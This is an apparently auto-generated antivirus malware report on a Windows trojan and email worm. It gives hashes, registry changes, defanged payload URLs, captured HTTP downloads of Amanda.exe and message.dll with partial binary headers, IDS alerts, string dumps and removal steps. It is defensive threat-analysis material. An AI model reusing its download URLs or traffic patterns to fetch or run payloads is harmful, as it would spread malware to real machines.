Trojan.Win32.FlyStudio_35e87b75f2

by malwarelabrobot on March 1st, 2017 in Malware Descriptions.

Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 35e87b75f290dcbe39eecf52381d7459
SHA1: 01394dc8d0c0e9accfa717424c3d452e69920ca9
SHA256: 3ac3b6a3acb9d69b1ada6afc49a5649da0fb83298ad67573bc3deebae915b5f7
SSDeep: 12288:2BpNBtPgZts9i 4WI 0s0GZ7boosmCXKOfyWOFeI2F/nbr:ynBtPStss 4WoshZFsmCXbyZeI2Vnf
Size: 929792 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: Mail.Ru
Created at: 2017-01-18 15:36:03
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

%original file name%.exe:3436

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

No files have been created.

Registry activity

The process %original file name%.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASAPI32]
"FileDirectory" = "%windir%\tracing"

"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
aa6018bc373aac97e1857d0ca7f9aa1d c:\Amanda.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.dywt.com.cn)
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 626406 626688 4.56748 2825fdf272c56162fa14e35c88f1e9e7
.rdata 630784 180124 180224 4.50828 ca0e545773fbc1f2faa722a42508cf67
.data 811008 263496 90112 3.67131 4489f849d064cb0ee150981248bad5f6
.rsrc 1077248 24788 28672 3.64703 0c0906bae5b17a82ec6d40d158acb865

Dropped from:

Downloaded by:

aa6018bc373aac97e1857d0ca7f9aa1d

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://u955.v.qingcdn.com/版本号.txt
hxxp://u755.v.qingcdn.com/Amanda.exe
hxxp://u755.v.qingcdn.com/message.dll
hxxp://o9fqva4p0.bkt.clouddn.com/Amanda.exe 1.193.152.113
hxxp://o9fqva4p0.bkt.clouddn.com/版本号.txt 1.193.152.113
hxxp://o9fqva4p0.bkt.clouddn.com/message.dll 1.193.152.113
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /message.dll HTTP/1.1
Host: o9fqva4p0.bkt.clouddn.com
Accept: */*
Referer: hXXp://o9fqva4p0.bkt.clouddn.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 200 OK
Date: Tue, 28 Feb 2017 11:46:04 GMT
Content-Type: application/x-msdownload
Content-Length: 757760
Connection: close
Server: openresty
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Log, X-Reqid
Access-Control-Max-Age: 2592000
Cache-Control: public, max-age=31536000
Content-Disposition: inline; filename="message.dll"
Content-Transfer-Encoding: binary
ETag: "FikUcN-q_-_bDoauCjiVQJCwTyJy"
Last-Modified: Wed, 18 Jan 2017 13:38:36 GMT
X-Log: mc.g/404;mc.g;RS;mc.s:13;IO:35
X-M-Log: QNM:xs444;QNM2:11
X-M-Reqid: WRsAAMiCHTtSNpsU
X-Qiniu-Zone: 0
X-Qnm-Cache: Hit
X-Reqid: WRsAAMcPpGNX4ZoU
X-Ser: BC83_dx-shandong-qingdao-1-cache-2, BC116_dx-henan-luoyang-2-cache-4
X-Cache: HIT from BC116_dx-henan-luoyang-2-cache-4(baishan)
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......Py0...^...^.
..^.o.R...^...P.?.^.">T...^.">U.B.^.B.M.8.^.v.M...^..._.Z.^...U.
_.^...T...^...^...^...X...^..8Z...^.Rich..^.........................PE
..L....o.X...........!................................................
.................................................................@..\Y
......................Ls..............................................
.....................................text.............................
.. ..`.rdata...*.......0..................@..@.data....J....... ......
............@....rsrc...\Y...@...`..................@..@.reloc..`.....
... ...p..............@..B............................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /Amanda.exe HTTP/1.1
Host: o9fqva4p0.bkt.clouddn.com
Accept: */*
Referer: hXXp://o9fqva4p0.bkt.clouddn.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 200 OK
Date: Tue, 28 Feb 2017 11:45:26 GMT
Content-Type: application/x-msdownload
Content-Length: 2699264
Connection: close
Server: openresty
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Log, X-Reqid
Access-Control-Max-Age: 2592000
Cache-Control: public, max-age=31536000
Content-Disposition: inline; filename="Amanda.exe"
Content-Transfer-Encoding: binary
ETag: "FoDR4g8HMCFUErWHc683si_Rf5ZX"
Last-Modified: Tue, 24 Jan 2017 06:31:18 GMT
X-Log: mc.g/404;mc.g;RS;mc.s;IO:7
X-M-Log: QNM:xs436;QNM2:160
X-M-Reqid: EWsAAOfgPcKXl6AU
X-Qiniu-Zone: 0
X-Qnm-Cache: Hit
X-Reqid: EWsAAGN_nXl5oZwU
X-Ser: BC25_dx-lt-hebei-shijiazhuang-2-cache-5, BC94_dx-henan-luoyang-2-cache-1
X-Cache: HIT from BC94_dx-henan-luoyang-2-cache-1(baishan)
MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$..............K...K
...K...K...K...K...K...K...K...K...KV..K...K...K...K...K...KV..K...K..
.K...K...K...K=..K...K=..K...K...K...K...K...KRich...K................
........PE..L......X.............................=............@.......
.................................................................. .&.
h....0-...............................................................
...............................................text...................
............ ..`.rdata..............................@..@.data....y....
&.......&.............@....rsrc........0-......`(.............@..@....
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /版本号.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: o9fqva4p0.bkt.clouddn.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 28 Feb 2017 11:45:03 GMT
Content-Type: text/plain
Content-Length: 5
Connection: keep-alive
Server: openresty
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Log, X-Reqid
Access-Control-Max-Age: 2592000
Cache-Control: public, max-age=31536000
Content-Disposition: inline; filename="版本号.txt"
Content-Transfer-Encoding: binary
ETag: "FgZ1LS-3_mX2GPQKmjPr5MyOIEMX"
Last-Modified: Tue, 24 Jan 2017 06:31:17 GMT
Vary: Accept-Encoding
X-Log: mc.g:1/404;mc.g;RS;mc.s;IO:132
X-M-Log: QNM:xs467;QNM2:156
X-M-Reqid: jAMAAIchB0_1mKAU
X-Qiniu-Zone: 0
X-Qnm-Cache: Hit
X-Reqid: jAMAAPYWvNZ6oZwU
X-Ser: BC15_dx-lt-yd-zhejiang-huzhou-2-cache-4, BC24_dx-henan-luoyang-2-cache-8
X-Cache: HIT from BC24_dx-henan-luoyang-2-cache-8(baishan)
3.2.6HTTP/1.1 200 OK..Date: Tue, 28 Feb 2017 11:45:03 GMT..Content-Typ
e: text/plain..Content-Length: 5..Connection: keep-alive..Server: open
resty..Accept-Ranges: bytes..Access-Control-Allow-Origin: *..Access-Co
ntrol-Expose-Headers: X-Log, X-Reqid..Access-Control-Max-Age: 2592000.
.Cache-Control: public, max-age=31536000..Content-Disposition: inline;
 filename="版本号.txt"..Content-Transfer-Encoding
: binary..ETag: "FgZ1LS-3_mX2GPQKmjPr5MyOIEMX"..Last-Modified: Tue, 24
 Jan 2017 06:31:17 GMT..Vary: Accept-Encoding..X-Log: mc.g:1/404;mc.g;
RS;mc.s;IO:132..X-M-Log: QNM:xs467;QNM2:156..X-M-Reqid: jAMAAIchB0_1mK
AU..X-Qiniu-Zone: 0..X-Qnm-Cache: Hit..X-Reqid: jAMAAPYWvNZ6oZwU..X-Se
r: BC15_dx-lt-yd-zhejiang-huzhou-2-cache-4, BC24_dx-henan-luoyang-2-ca
che-8..X-Cache: HIT from BC24_dx-henan-luoyang-2-cache-8(baishan)..3.2
.6..
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3436:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
iu2.iu
K(.wS
hXXp://o9fqva4p0.bkt.clouddn.com/版本号.txt
\Amanda.exe
Amanda.exe
\message.dll
hXXp://o9fqva4p0.bkt.clouddn.com/Amanda.exe
Amanda.exe
message.dll
hXXp://o9fqva4p0.bkt.clouddn.com/message.dll
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
Adobe Photoshop CS5 Windows
2016:06:20 13:05:02
urlTEXT
MsgeTEXT
hXXp://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2016-06-20T13:02:43 08:00" xmp:ModifyDate="2016-06-20T13:05:02 08:00" xmp:MetadataDate="2016-06-20T13:05:02 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:6F95E2BDA236E6118081BE908546A5F9" xmpMM:DocumentID="xmp.did:6E95E2BDA236E6118081BE908546A5F9" xmpMM:OriginalDocumentID="xmp.did:6E95E2BDA236E6118081BE908546A5F9"> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>FDDAF324562CCAF98AD0878DF6C38ECD</rdf:li> <rdf:li>adobe:docid:photoshop:a043a76b-fd6e-11e1-97b0-f6ab5068cc11</rdf:li> <rdf:li>adobe:docid:photoshop:a650e4b2-ea8a-11e1-b87e-d4152676a408</rdf:li> <rdf:li>uuid:344316114DABE311A76CC07415A76379</rdf:li> <rdf:li>xmp.did:2DB840ACA1DFE211B2DBAC62071392BE</rdf:li> <rdf:li>xmp.did:33FE99049FDFE211B02DC4A632305F66</rdf:li> <rdf:li>xmp.did:4DFB0091418DE211B7A9A5551920B8D0</rdf:li> <rdf:li>xmp.did:79D222771D8DE21189C9B809F441AEBB</rdf:li> <rdf:li>xmp.did:81705823505EE311BDC7E69C1E3C0513</rdf:li> <rdf:li>xmp.did:9E4497AE9836E6118B329346CAAD0A56</rdf:li> <rdf:li>xmp.did:A08F306EB9DFE211B480FDAA05312368</rdf:li> <rdf:li>xmp.did:B0EA94F7BD03E311B71FC5CF99B624FB</rdf:li> <rdf:li>xmp.did:C1E59A82E8B6E2118115A10488109247</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:6E95E2BDA236E6118081BE908546A5F9" stEvt:when="2016-06-20T13:02:43 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="converted" stEvt:parameters="from image/png to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:6F95E2BDA236E6118081BE908546A5F9" stEvt:when="2016-06-20T13:05:02 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
VO%Xi"r5
UMSG$PGYS
#W%Du
!%%C!
l.ofk
<U_wcrT5(b
`.yws
C%FKg
cOL
/%Xmj=m
x.nn#
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
RASAPI32.dll
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
HTTP/1.1
hXXp://
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
3.2.6
ssage.dll 100%
GET /message.dll HTTP/1.1
Host: o9fqva4p0.bkt.clouddn.com
Referer: hXXp://o9fqva4p0.bkt.clouddn.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
%%%)***1///62228///6)))2$$$ 
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
(*.*)
1.0.0.0
(hXXp://VVV.dywt.com.cn)


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3436

  2. Delete the original Trojan file.
  3. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now